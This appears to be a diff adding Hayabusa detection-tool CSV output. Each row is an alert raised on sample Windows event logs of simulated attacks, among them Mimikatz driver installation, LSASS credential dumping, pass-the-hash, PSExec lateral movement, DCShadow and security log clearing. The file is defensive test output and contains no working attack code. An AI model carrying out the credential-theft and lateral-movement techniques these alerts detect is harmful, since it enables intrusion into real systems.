+2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-17 00:50:54.591 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-26 06:56:19.530 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:56:32.794 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:56:50.874 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:56:53.090 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:57:05.324 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:57:11.415 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account:  | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
+2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
+2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account:  | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
+2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
+2021-03-27 05:41:38.966 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
+2021-03-27 05:41:39.009 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
+2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.296 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.306 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.860 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.861 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:20.254 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
+2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
+2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
+2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.364 +09:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
